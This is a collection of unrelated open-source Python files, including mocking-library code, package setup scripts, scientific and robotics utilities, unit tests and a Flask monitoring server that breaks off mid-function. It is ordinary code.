Will create an empty unconfigured object, that you can pass
around. All interactions (method calls) will be recorded and can be
verified using :func:`verify` et.al.
A plain `mock()` will be not `strict`, and thus all methods regardless
of the arguments will return ``None``.
.. note:: Technically all attributes will return an internal interface.
Because of that a simple ``if mock().foo:`` will surprisingly pass.
If you set strict to ``True``: ``mock(strict=True)`` all unexpected
interactions will raise an error instead.
You configure a mock using :func:`when`, :func:`when2` or :func:`expect`.
You can also very conveniently just pass in a dict here::
response = mock({'text': 'ok', 'raise_for_status': lambda: None})
You can also create an empty Mock which is specced against a given
`spec`: ``mock(requests.Response)``. These mock are by default strict,
thus they raise if you want to stub a method, the spec does not implement.
Mockito will also match the function signature.
You can pre-configure a specced mock as well::
response = mock({'json': lambda: {'status': 'Ok'}},
spec=requests.Response)
Mocks are by default callable. Configure the callable behavior using
`when`::
dummy = mock()
when(dummy).__call__(1).thenReturn(2)
All other magic methods must be configured this way or they will raise an
AttributeError.
See :func:`verify` to verify your interactions after usage.
"""
if type(config_or_spec) is dict:
config = config_or_spec
else:
config = {}
spec = config_or_spec
if strict is OMITTED:
strict = False if spec is None else True
class Dummy(_Dummy):
if spec:
__class__ = spec # make isinstance work
def __getattr__(self, method_name):
if strict:
__tracebackhide__ = operator.methodcaller(
"errisinstance", AttributeError
)
raise AttributeError(
"'Dummy' has no attribute %r configured" % method_name)
return functools.partial(
remembered_invocation_builder, theMock, method_name)
def __repr__(self):
name = 'Dummy'
if spec:
name += spec.__name__
return "<%s id=%s>" % (name, id(self))
# That's a tricky one: The object we will return is an *instance* of our
# Dummy class, but the mock we register will point and patch the class.
# T.i. so that magic methods (`__call__` etc.) can be configured.
obj = Dummy()
theMock = Mock(Dummy, strict=strict, spec=spec)
for n, v in config.items():
if inspect.isfunction(v):
invocation.StubbedInvocation(theMock, n)(Ellipsis).thenAnswer(v)
else:
setattr(Dummy, n, v)
mock_registry.register(obj, theMock)
return obj
|
the-stack_106_30573 | from setuptools import setup, find_packages
import platform
from pathlib import Path
import subprocess
import sys
import warnings
assert platform.system() == 'Windows', "Sorry, this module is only compatible with Windows so far."
archstr = platform.machine()
if archstr.endswith('64'):
arch = "x64"
elif archstr.endswith('86'):
arch = "x86"
else:
if platform.architecture()[0] == "64bit":
arch = "x64"
else:
arch = "x86"
warnings.warn(f"vgamepad could not determine your system architecture: \
the vigembus installer will default to {arch}. If this is not your machine architecture, \
please cancel the upcoming vigembus installation and install vigembus manually from \
https://github.com/ViGEm/ViGEmBus/releases/tag/setup-v1.17.333")
pathMsi = Path(__file__).parent.absolute() / "vgamepad" / "win" / "vigem" / "install" / arch / ("ViGEmBusSetup_" + arch + ".msi")
# Prompt installation of the ViGEmBus driver (blocking call)
if sys.argv[1] != 'egg_info' and sys.argv[1] != 'sdist':
subprocess.call('msiexec /i %s' % str(pathMsi), shell=True)
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='vgamepad',
packages=[package for package in find_packages()],
version='0.0.5',
license='MIT',
description='Virtual XBox360 and DualShock4 gamepads in python',
long_description=long_description,
long_description_content_type="text/markdown",
author='Yann Bouteiller',
url='https://github.com/yannbouteiller/vgamepad',
download_url='https://github.com/yannbouteiller/vgamepad/archive/refs/tags/v0.0.5.tar.gz',
keywords=['virtual', 'gamepad', 'python', 'xbox', 'dualshock', 'controller', 'emulator'],
install_requires=[],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Topic :: Software Development :: Build Tools',
'Topic :: Games/Entertainment',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
],
package_data={'vgamepad': [
'win/vigem/client/x64/ViGEmClient.dll',
'win/vigem/client/x86/ViGEmClient.dll',
'win/vigem/install/x64/ViGEmBusSetup_x64.msi',
'win/vigem/install/x86/ViGEmBusSetup_x86.msi',
]}
)
|
the-stack_106_30574 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Libnetworkit(CMakePackage):
"""NetworKit is a growing open-source toolkit for large-scale network
analysis. Its aim is to provide tools for the analysis of large networks
in the size range from thousands to billions of edges. For this purpose,
it implements efficient graph algorithms, many of them parallel to
utilize multicore architectures. These are meant to compute standard
measures of network analysis, such as degree sequences, clustering
coefficients, and centrality measures. In this respect, NetworKit is
comparable to packages such as NetworkX, albeit with a focus on
parallelism and scalability."""
homepage = "https://networkit.github.io/"
url = "https://github.com/networkit/networkit/archive/6.1.tar.gz"
maintainers = ['fabratu']
version('7.0', sha256='4faf16c5fae3e14d3c1b6f30e25c6e093dcf6a3dbf021235f3161ac2a527f682')
version('6.1', sha256='22c953ea1054c356663b31c77114c2f0c8fec17e0e707aeec23026241beab9b2')
variant('static', default=False, description='Enables the build of shared libraries')
variant('doc', default=False, description='Enables the build with sphinx documentation')
depends_on('libtlx')
depends_on('py-sphinx', when='+doc', type='build')
patch('0001-Name-agnostic-import-of-tlx-library.patch', when='@6.1')
def cmake_args(self):
spec = self.spec
tlx_libs = spec['libtlx'].prefix
args = ['-DNETWORKIT_EXT_TLX=%s' % tlx_libs,
'-DNETWORKIT_STATIC=%s' %
('ON' if '+static' in spec else 'OFF')]
return args
|
the-stack_106_30575 | #
# Copyright (C) 2001 greg Landrum
#
""" unit testing code for the descriptor COM server
"""
from __future__ import print_function
from rdkit import RDConfig
import unittest
import Parser
from win32com.client import Dispatch
from Numeric import *
class TestCase(unittest.TestCase):
def setUp(self):
print('\n%s: '%self.shortDescription(),end='')
def testConnect(self):
" testing connection "
ok = 1
try:
c = Dispatch('RD.DescCalc')
except:
ok = 0
assert ok and c is not None, 'connection to COM server failed'
def testLoad(self):
" testing load "
c = Dispatch('RD.DescCalc')
ok = 1
try:
c.LoadCalculator(RDConfig.RDCodeDir+'/ml/descriptors/test_data/ferro.dsc')
except:
ok = 0
assert ok, 'LoadCalculator failed'
def testNames(self):
" testing GetDescriptorNames "
c = Dispatch('RD.DescCalc')
c.LoadCalculator(RDConfig.RDCodeDir+'/ml/descriptors/test_data/ferro.dsc')
names = c.GetDescriptorNames()
expectedNames = ('MAX_DED','has3d','has4d','has5d','elconc','atvol')
assert names==expectedNames, 'GetDescriptorNames failed (%s != %s)'%(repr(names),
repr(expectedNames))
def testCalc(self):
" testing descriptor calculation "
argV = ['CrPt3','fcc','AuCu3',58.09549962,1,4,0.228898,8.876,1]
nameV = ['Compound','Structure','Structure_Type','Volume',
'Z','Atoms_per_Formula_Unit','Hardness','RawDOS_Ef',
'IsFerromagnetic']
c = Dispatch('RD.DescCalc')
c.LoadCalculator(RDConfig.RDCodeDir+'/ml/descriptors/test_data/ferro.dsc')
ok = 1
descVect = array(c.CalcDescriptors(argV,nameV))
expected = array((3.67481803894, 1, 0, 1, 0.619669341609, 14.523874905))
diffV = abs(descVect-expected)
assert ok, 'CalcDescriptors failed'
assert max(diffV)<0.0001,'bad descriptors: %s, %s'%(str(expected),str(descVect))
def TestSuite():
suite = unittest.TestSuite()
suite.addTest(TestCase('testConnect'))
suite.addTest(TestCase('testLoad'))
suite.addTest(TestCase('testNames'))
suite.addTest(TestCase('testCalc'))
return suite
if __name__ == '__main__':
suite = TestSuite()
unittest.TextTestRunner().run(suite)
|
the-stack_106_30579 | import unittest
from checkov.terraform.parser import Parser
from checkov.terraform.evaluation.evaluation_methods.const_variable_evaluation import ConstVariableEvaluation
from checkov.terraform.context_parsers.registry import parser_registry
import dpath.util
import os
class TestConstVariableEvaluation(unittest.TestCase):
def setUp(self):
test_root_dir = os.path.dirname(os.path.realpath(__file__)) + '/resources/default_evaluation'
tf_definitions = {}
parsing_errors = {}
Parser().hcl2(directory=test_root_dir, tf_definitions=tf_definitions, parsing_errors=parsing_errors)
for definition in tf_definitions.items():
definitions_context = parser_registry.enrich_definitions_context(definition)
variable_evaluator = ConstVariableEvaluation(test_root_dir, tf_definitions, definitions_context)
variable_evaluator.evaluate_variables()
self.tf_definitions = variable_evaluator.tf_definitions
self.definitions_context = variable_evaluator.definitions_context
def test_evaluate_variables(self):
self.assertEqual(
dpath.get(self.tf_definitions[
os.path.dirname(os.path.realpath(__file__)) + '/resources/default_evaluation/main.tf'],
'resource/0/aws_cognito_user_group/user_group/name/0'),
'Pavel_Checkov_group')
def test__extract_context_path(self):
path = 'resource/0/aws_cognito_user_group/user_group/name/0'
self.assertEqual(ConstVariableEvaluation._extract_context_path(path),
('resource/aws_cognito_user_group/user_group', 'name'))
def test_all_expressions_evaluated(self):
self.assertEqual(
len(dpath.get(self.definitions_context[
os.path.dirname(os.path.realpath(__file__)) + '/resources/default_evaluation/main.tf'],
'evaluations/dummy_1/definitions')),
2)
def tearDown(self):
parser_registry.definitions_context = {}
if __name__ == '__main__':
unittest.main()
|
the-stack_106_30581 | import io, os, csv, random, logging
from jacks.infer import LOG
from jacks.jacks_io import createGeneSpec, createSampleSpec, getJacksParser, collateTestControlSamples, writeJacksWResults
from jacks.preprocess import loadDataAndPreprocess
import scipy as SP
def infer_JACKS_meanfc(gene_index, testdata, ctrldata):
results = {}
for gene in gene_index:
Ig = gene_index[gene]
y = (testdata[Ig,:,0] - ctrldata[Ig,:,0])
w1 = SP.nanmean(y,axis=0)
results[gene] = (y,-1.0,-1.0,-1.0,w1,-1.0)
return results
LOG.setLevel(logging.WARNING)
parser = getJacksParser()
args = parser.parse_args()
outprefix = args.outprefix
if '/' in outprefix and not os.path.exists(os.path.dirname(outprefix)): os.makedirs(os.path.dirname(outprefix))
outfile_w = outprefix + '_gene_results.txt'
outfile_w2 = outprefix + '_genestd_results.txt'
# Load the specification of samples to include
LOG.info('Loading sample specification')
sample_spec, ctrl_spec, sample_num_reps = createSampleSpec(args.countfile, args.replicatefile, args.rep_hdr,
args.sample_hdr, args.common_ctrl_sample, args.ctrl_sample_hdr)
# Load the mappings from guides to genes
LOG.info('Loading gene mappings')
gene_spec = createGeneSpec(args.guidemappingfile, args.sgrna_hdr, args.gene_hdr)
# Load the data and preprocess
LOG.info('Loading data and pre-processing')
data, meta, sample_ids, genes, gene_index = loadDataAndPreprocess(sample_spec, gene_spec)
gene_grnas = {gene: [x for x in meta[gene_index[gene], 0]] for gene in gene_index}
#Compute MeanFC for all samples against their controls
LOG.info('Running Single JACKS inference')
testdata, ctrldata, test_sample_idxs = collateTestControlSamples(data, sample_ids, ctrl_spec)
jacks_results = infer_JACKS_meanfc(gene_index, testdata, ctrldata)
# Write out the results
LOG.info('Writing Single JACKS results')
sample_ids_without_ctrl = [sample_ids[idx] for idx in test_sample_idxs]
writeJacksWResults(outprefix, jacks_results, sample_ids_without_ctrl, write_types=[''])
|
the-stack_106_30584 | """Constants for the Ruckus Unleashed integration."""
import logging
DOMAIN = "ruckus_unleashed"
PLATFORMS = ["device_tracker"]
SCAN_INTERVAL = 180
_LOGGER = logging.getLogger(__name__)
COORDINATOR = "coordinator"
UNDO_UPDATE_LISTENERS = "undo_update_listeners"
CLIENTS = "clients"
|
the-stack_106_30585 | import argparse
import os
from kalasanty.data import prepare_dataset
from tfbio.data import Featurizer
from tqdm import tqdm
def input_path(path):
"""Check if input exists."""
path = os.path.abspath(path)
if not os.path.exists(path):
raise IOError('%s does not exist.' % path)
return path
def output_path(path):
"""Check if output file can be created."""
path = os.path.abspath(path)
dirname = os.path.dirname(path)
if not os.access(dirname, os.W_OK):
raise IOError('File %s cannot be created (check your permissions).'
% path)
return path
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--srcDataset', '-s', required=True, type=input_path,
help='path to the source database')
parser.add_argument('--destDataset', '-d', required=True, type=input_path,
help='path to the processed database')
parser.add_argument('--include', '-i', type=input_path, nargs='*',
help='text file with IDs to use (each in separate line). '
'If not specified, all proteins in the database '
'(except those listed with --exclude) will be used. '
'Note that --exclude has higher priority (i.e. if '
'ID is specified with both -e and -i it will be skipped)')
parser.add_argument('--exclude', '-e', type=input_path, nargs='*',
help='text file with IDs to skip (each in separate line). '
'It has higher priority than --include (i.e. if '
'ID is specified with both -e and -i it will be skipped)')
parser.add_argument('--output', '-o', default='./pockets.hdf', type=output_path,
help='name for the file with the prepared structures')
parser.add_argument('--mode', '-m', default='w',
type=str, choices=['r+', 'w', 'w-', 'x', 'a'],
help='mode for the output file (see h5py documentation)')
parser.add_argument('--db_format', '-f', default='scpdb',
type=str, choices=['scpdb', 'pdbbind','pdbbind2'],
help='way the database is structured - like sc-PDB or '
'like PDBbind (see examples in tests/datasets directory)')
parser.add_argument('--verbose', '-v', action='store_true',
help='whether to print messages')
return parser.parse_args()
def main():
args = parse_args()
blacklist = []
if args.exclude:
for fname in args.exclude:
with open(fname) as f:
blacklist += f.read().split('\n')
if args.include:
all_ids = []
for fname in args.include:
with open(fname) as f:
all_ids += list(filter(None, f.read().split('\n')))
else:
all_ids = os.listdir(args.destDataset)
ids = [i for i in all_ids if i not in blacklist]
if len(ids) == 0:
raise RuntimeError('No data to process (empty list of IDs)')
protein_featurizer = Featurizer(save_molecule_codes=False)
if args.verbose:
print('%s IDs to process' % len(ids))
print('(%s total, %s excluded)' % (len(all_ids), len(blacklist)))
progress_bar = tqdm
else:
progress_bar = None
prepare_dataset(args.srcDataset, args.destDataset, protein_featurizer, ids=ids, db_format=args.db_format,
hdf_path=args.output, hdf_mode=args.mode,
progress_bar=progress_bar, verbose=args.verbose)
if __name__ == '__main__':
main()
|
the-stack_106_30586 | """This module implements an operator acts like a IMU driver when
using the simulator.
The operator attaches an IMU sensor to the ego vehicle, receives
IMU measurements from the simulator, and sends them on its output stream.
"""
import threading
import erdos
from pylot.localization.messages import IMUMessage
from pylot.simulation.utils import get_vehicle_handle, get_world, \
set_simulation_mode
from pylot.utils import Transform, Vector3D
class CarlaIMUDriverOperator(erdos.Operator):
"""Publishes IMU mesurements (transform, acceleration, gyro and
compass) from IMU (inertial measurement unit) sensor.
This operator attaches to a vehicle at the required position with respect
to the vehicle, registers callback functions to retrieve the IMU
measurements and publishes it to downstream operators.
Args:
ego_vehicle_id_stream (:py:class:`erdos.ReadStream`): Stream on
which the operator receives the id of the ego vehicle. It uses this
id to get a simulator handle to the vehicle.
imu_stream (:py:class:`erdos.WriteStream`): Stream on which the
operator sends IMU info.
imu_setup (:py:class:`pylot.drivers.sensor_setup.IMUSetup`):
Setup of the IMU sensor.
flags (absl.flags): Object to be used to access absl flags.
"""
def __init__(self, ego_vehicle_id_stream, imu_stream, imu_setup, flags):
self._vehicle_id_stream = ego_vehicle_id_stream
self._imu_stream = imu_stream
# The operator does not pass watermarks by defaults.
self._flags = flags
self._logger = erdos.utils.setup_logging(self.config.name,
self.config.log_file_name)
self._imu_setup = imu_setup
# The hero vehicle actor object we obtain from the simulator.
self._vehicle = None
# The IMU sensor actor object we obtain from the simulator.
self._imu = None
# Lock to ensure that the callbacks do not execute simultaneously.
self._lock = threading.Lock()
@staticmethod
def connect(ego_vehicle_id_stream):
imu_stream = erdos.WriteStream()
return [imu_stream]
def process_imu(self, imu_msg):
"""Invoked when an IMU message is received from the simulator.
Sends IMU measurements to downstream operators.
Args:
imu_msg (carla.IMUMeasurement): IMU reading.
"""
game_time = int(imu_msg.timestamp * 1000)
timestamp = erdos.Timestamp(coordinates=[game_time])
watermark_msg = erdos.WatermarkMessage(timestamp)
with erdos.profile(self.config.name + '.process_imu',
self,
event_data={'timestamp': str(timestamp)}):
with self._lock:
msg = IMUMessage(
timestamp,
Transform.from_simulator_transform(imu_msg.transform),
Vector3D.from_simulator_vector(imu_msg.accelerometer),
Vector3D.from_simulator_vector(imu_msg.gyroscope),
imu_msg.compass)
self._imu_stream.send(msg)
# Note: The operator is set not to automatically propagate
# watermarks received on input streams. Thus, we can issue
# watermarks only after the simulator callback is invoked.
self._imu_stream.send(watermark_msg)
def run(self):
# Read the vehicle id from the vehicle id stream
vehicle_id_msg = self._vehicle_id_stream.read()
vehicle_id = vehicle_id_msg.data
self._logger.debug(
"The IMUDriverOperator received the vehicle id: {}".format(
vehicle_id))
# Connect to the world. We connect here instead of in the constructor
# to ensure we're connected to the latest world.
_, world = get_world(self._flags.simulator_host,
self._flags.simulator_port,
self._flags.simulator_timeout)
set_simulation_mode(world, self._flags)
self._vehicle = get_vehicle_handle(world, vehicle_id)
# Install the IMU.
imu_blueprint = world.get_blueprint_library().find('sensor.other.imu')
# Set noise attributes.
imu_blueprint.set_attribute('noise_accel_stddev_x',
str(self._flags.accel_noise_stddev_x))
imu_blueprint.set_attribute('noise_accel_stddev_y',
str(self._flags.accel_noise_stddev_y))
imu_blueprint.set_attribute('noise_accel_stddev_z',
str(self._flags.accel_noise_stddev_z))
imu_blueprint.set_attribute('noise_gyro_stddev_x',
str(self._flags.gyro_noise_stddev_x))
imu_blueprint.set_attribute('noise_gyro_stddev_y',
str(self._flags.gyro_noise_stddev_y))
imu_blueprint.set_attribute('noise_gyro_stddev_z',
str(self._flags.gyro_noise_stddev_z))
if self._flags.simulator_imu_frequency == -1:
imu_blueprint.set_attribute('sensor_tick', '0.0')
else:
imu_blueprint.set_attribute(
'sensor_tick', str(1.0 / self._flags.simulator_imu_frequency))
transform = self._imu_setup.get_transform().as_simulator_transform()
self._logger.debug("Spawning an IMU: {}".format(self._imu_setup))
self._imu = world.spawn_actor(imu_blueprint,
transform,
attach_to=self._vehicle)
# Register the callback on the IMU.
self._imu.listen(self.process_imu)
|
the-stack_106_30587 | from future import standard_library
standard_library.install_aliases()
import os
import sys
import subprocess
try:
from configparser import ConfigParser
except ImportError:
from configparser import ConfigParser # python 3
COMMIT_INFO_FNAME = 'COMMIT_INFO.txt'
def pkg_commit_hash(pkg_path):
''' Get short form of commit hash given directory `pkg_path`
There should be a file called 'COMMIT_INFO.txt' in `pkg_path`. This is a
file in INI file format, with at least one section: ``commit hash``, and two
variables ``archive_subst_hash`` and ``install_hash``. The first has a
substitution pattern in it which may have been filled by the execution of
``git archive`` if this is an archive generated that way. The second is
filled in by the installation, if the installation is from a git archive.
We get the commit hash from (in order of preference):
* A substituted value in ``archive_subst_hash``
* A written commit hash value in ``install_hash`
* git's output, if we are in a git repository
If all these fail, we return a not-found placeholder tuple
Parameters
----------
pkg_path : str
directory containing package
Returns
-------
hash_from : str
Where we got the hash from - description
hash_str : str
short form of hash
'''
# Try and get commit from written commit text file
pth = os.path.join(pkg_path, COMMIT_INFO_FNAME)
if not os.path.isfile(pth):
raise IOError('Missing commit info file %s' % pth)
cfg_parser = ConfigParser()
cfg_parser.read(pth)
archive_subst = cfg_parser.get('commit hash', 'archive_subst_hash')
if not archive_subst.startswith('$Format'): # it has been substituted
return 'archive substitution', archive_subst
install_subst = cfg_parser.get('commit hash', 'install_hash')
if install_subst != '':
return 'installation', install_subst
# maybe we are in a repository
proc = subprocess.Popen('git rev-parse --short HEAD',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=pkg_path, shell=True)
repo_commit, _ = proc.communicate()
if repo_commit:
return 'repository', repo_commit.strip()
return '(none found)', '<not found>'
def get_pkg_info(pkg_path):
''' Return dict describing the context of this package
Parameters
----------
pkg_path : str
path containing __init__.py for package
Returns
-------
context : dict
with named parameters of interest
'''
src, hsh = pkg_commit_hash(pkg_path)
import networkx
import nibabel
import numpy
import scipy
import traits
return dict(
pkg_path=pkg_path,
commit_source=src,
commit_hash=hsh,
sys_version=sys.version,
sys_executable=sys.executable,
sys_platform=sys.platform,
numpy_version=numpy.__version__,
scipy_version=scipy.__version__,
networkx_version=networkx.__version__,
nibabel_version=nibabel.__version__,
traits_version=traits.__version__)
|
the-stack_106_30589 | # ----------------------------------------------------------------------------
# - Open3D: www.open3d.org -
# ----------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2018-2021 www.open3d.org
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# ----------------------------------------------------------------------------
"""ICP (Iterative Closest Point) registration algorithm"""
import open3d as o3d
import numpy as np
import copy
def draw_registration_result(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
source_temp.paint_uniform_color([1, 0.706, 0])
target_temp.paint_uniform_color([0, 0.651, 0.929])
source_temp.transform(transformation)
o3d.visualization.draw([source_temp, target_temp])
def point_to_point_icp(source, target, threshold, trans_init):
print("Apply point-to-point ICP")
reg_p2p = o3d.pipelines.registration.registration_icp(
source, target, threshold, trans_init,
o3d.pipelines.registration.TransformationEstimationPointToPoint())
print(reg_p2p)
print("Transformation is:")
print(reg_p2p.transformation, "\n")
draw_registration_result(source, target, reg_p2p.transformation)
def point_to_plane_icp(source, target, threshold, trans_init):
print("Apply point-to-plane ICP")
reg_p2l = o3d.pipelines.registration.registration_icp(
source, target, threshold, trans_init,
o3d.pipelines.registration.TransformationEstimationPointToPlane())
print(reg_p2l)
print("Transformation is:")
print(reg_p2l.transformation, "\n")
draw_registration_result(source, target, reg_p2l.transformation)
if __name__ == "__main__":
pcd_data = o3d.data.DemoICPPointClouds()
source = o3d.io.read_point_cloud(pcd_data.paths[0])
target = o3d.io.read_point_cloud(pcd_data.paths[1])
threshold = 0.02
trans_init = np.asarray([[0.862, 0.011, -0.507, 0.5],
[-0.139, 0.967, -0.215, 0.7],
[0.487, 0.255, 0.835, -1.4], [0.0, 0.0, 0.0, 1.0]])
draw_registration_result(source, target, trans_init)
print("Initial alignment")
evaluation = o3d.pipelines.registration.evaluate_registration(
source, target, threshold, trans_init)
print(evaluation, "\n")
point_to_point_icp(source, target, threshold, trans_init)
point_to_plane_icp(source, target, threshold, trans_init)
|
the-stack_106_30592 | from setuptools import find_packages, setup
import sys
CORE_REQUIREMENTS = [
'numpy>=1.18.0, <1.18.99',
'six>=1.14, <1.14.99',
'future>=0.18.0, <0.18.99'
]
if sys.version_info < (3, 7):
REQUIRES = CORE_REQUIREMENTS + ["dataclasses"]
else:
REQUIRES = CORE_REQUIREMENTS
with open('README.md') as f:
long_description = f.read()
setup(
name='pulpo',
version='0.0.1',
setup_cfg=True,
python_requires='~=3.6',
packages=find_packages(where='.'),
long_description=long_description,
long_description_content_type='text/markdown',
setup_requires=['setuptools>=39.1.0'],
url='https://github.com/pm3310/pulpo',
install_requires=REQUIRES,
test_suite='tests',
zip_safe=True
)
|
the-stack_106_30594 | #!/usr/bin/env python
#
# Copyright (2021) The Delta Lake Project Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import subprocess
from os import path
def run_sbt_tests(root_dir):
print("##### Running SBT tests #####")
sbt_path = path.join(root_dir, path.join("build", "sbt"))
run_cmd([sbt_path, "clean", "test"], stream_output=True)
def run_python_tests(root_dir):
print("##### Running Python tests #####")
python_test_script = path.join(root_dir, path.join("python", "run-tests.py"))
print("Calling script %s", python_test_script)
run_cmd(["python", python_test_script], stream_output=True)
def run_cmd(cmd, throw_on_error=True, env=None, stream_output=False, **kwargs):
cmd_env = os.environ.copy()
if env:
cmd_env.update(env)
if stream_output:
child = subprocess.Popen(cmd, env=cmd_env, **kwargs)
exit_code = child.wait()
if throw_on_error and exit_code != 0:
raise Exception("Non-zero exitcode: %s" % (exit_code))
return exit_code
else:
child = subprocess.Popen(
cmd,
env=cmd_env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
**kwargs)
(stdout, stderr) = child.communicate()
exit_code = child.wait()
if throw_on_error and exit_code is not 0:
raise Exception(
"Non-zero exitcode: %s\n\nSTDOUT:\n%s\n\nSTDERR:%s" %
(exit_code, stdout, stderr))
return (exit_code, stdout, stderr)
if __name__ == "__main__":
if os.getenv("USE_DOCKER") is not None:
prepare_docker_img = ["docker", "build", "--tag=pydeltalake", "."]
run_cmd(prepare_docker_img, stream_output=True)
# JENKINS_URL is passed here so that the Docker container
# can be in line with Jenkins build behavior(usage of sbt sources)
cmd = ["docker", "run", "-e", "JENKINS_URL",
"-e", "SBT_1_5_5_MIRROR_JAR_URL", "pydeltalake:latest"]
run_cmd(cmd, stream_output=True)
else:
root_dir = os.path.dirname(os.path.dirname(__file__))
run_sbt_tests(root_dir)
run_python_tests(root_dir)
|
the-stack_106_30596 | SHIFT = 10
def parse_init(line):
return [c == '#' for c in line[15:].strip()]
def parse_rules(lines):
rules = []
for line in lines:
if line[9] == '#':
rules.append([c == '#' for c in line[:5]])
return rules
def calculate_next_state(state, rules):
# experimentally we never need to increase the size
# of the array on the left, which makes it easier
if sum(state[-5:]):
state = state + [False * 10] # increase on the right if needed
next_state = []
for i in range(len(state)):
if i < 2 or i > len(state) - 3:
next_state += [False]
else:
next_state += [state[i-2:i+3] in rules]
return next_state
def sum_plants(state):
total = 0
for i in range(len(state)):
if state[i] == 1:
total += i - SHIFT
return total
def calculate_positions(state):
pos_absolute = []
for i in range(len(state)):
if state[i]:
pos_absolute += [i]
return [pos - pos_absolute[0] for pos in pos_absolute]
def process(init, rules, generations):
last_state = [False] * SHIFT + init + [False] * SHIFT
history = [last_state]
position_founds = [calculate_positions(last_state)]
for i in range(generations):
last_state = calculate_next_state(last_state, rules)
history += [last_state]
new_pos = calculate_positions(last_state)
if new_pos == position_founds[-1]:
# we found a pattern that shifts itself from a step to the next
# we do not need to process all steps, just to find the final shift
curr_sum = sum_plants(last_state)
prev_sum = sum_plants(history[-2])
diff = curr_sum - prev_sum
return curr_sum + diff * (generations - (i + 1))
position_founds += [new_pos]
# this will not be reached for a big generations value
# we rely on the fact that we will find a pattern shifting iteself
return sum_plants(last_state)
def compute(file_name):
with open(file_name, "r") as file:
init = parse_init(file.readline())
file.readline() # skip empty line
rules = parse_rules(file.readlines())
return process(init, rules, 50000000000)
if __name__ == '__main__':
print("Sum of plants positions = ", compute("data.txt"))
|
the-stack_106_30597 | from flask import Flask, jsonify
from gevent.wsgi import WSGIServer
from collections import deque
import logging
import binascii
import decimal
class Logger(object):
""" A dummy file object to allow using a logger to log requests instead
of sending to stderr like the default WSGI logger """
logger = None
def write(self, s):
self.logger.info(s.strip())
class ReverseProxied(object):
'''Wrap the application in this middleware and configure the
front-end server to add these headers, to let you quietly bind
this to a URL other than / and to an HTTP scheme that is
different than what is used locally.
In nginx:
location /myprefix {
proxy_pass http://192.168.0.1:5001;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Scheme $scheme;
proxy_set_header X-Script-Name /myprefix;
}
:param app: the WSGI application
'''
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
script_name = environ.get('HTTP_X_SCRIPT_NAME', '')
if script_name:
environ['SCRIPT_NAME'] = script_name
path_info = environ['PATH_INFO']
if path_info.startswith(script_name):
environ['PATH_INFO'] = path_info[len(script_name):]
scheme = environ.get('HTTP_X_SCHEME', '')
if scheme:
environ['wsgi.url_scheme'] = scheme
return self.app(environ, start_response)
class ServerMonitor(WSGIServer):
""" Provides a few useful json endpoints for viewing server health and
performance. """
def __init__(self, manager):
self.logger = logging.getLogger(self.__class__.__name__)
self.manager = manager
self.settings = self.manager.settings
app = Flask(__name__)
app.wsgi_app = ReverseProxied(app.wsgi_app)
app.add_url_rule('/', 'general', self.general)
self.app = app
def start(self, *args, **kwargs):
WSGIServer.__init__(self, self.settings['ui_address'], self.app,
spawn=100, log=Logger())
self.logger.info("Monitoring port listening on {}"
.format(self.settings['ui_address']))
# Monkey patch the wsgi logger
Logger.logger = self.logger
WSGIServer.start(self, *args, **kwargs)
def stop(self, *args, **kwargs):
WSGIServer.stop(self)
self.logger.info("Exit")
def general(self):
conns = []
for conn in self.manager.peermgr.peers:
conns.append(dict(height=conn.remote_height,
protocol_version=conn.ver_send,
client_version=conn.client_version,
address="{}:{}".format(conn.dstaddr, conn.dstport)))
data = dict(height=self.manager.chaindb.getheight(),
hash=binascii.hexlify(self.manager.chaindb.gettophash()[::-1]),
peer_count=len(self.manager.peermgr.peers),
peers=conns)
return jsonify(jsonize(data))
def jsonize(item):
""" Recursive function that converts a lot of non-serializable content
to something json.dumps will like better """
if isinstance(item, dict):
new = {}
for k, v in item.iteritems():
k = str(k)
if isinstance(v, deque):
new[k] = jsonize(list(v))
else:
new[k] = jsonize(v)
return new
elif isinstance(item, list) or isinstance(item, tuple):
new = []
for part in item:
new.append(jsonize(part))
return new
else:
if isinstance(item, str):
return item.encode('string_escape')
elif isinstance(item, set):
return list(item)
elif isinstance(item, decimal.Decimal):
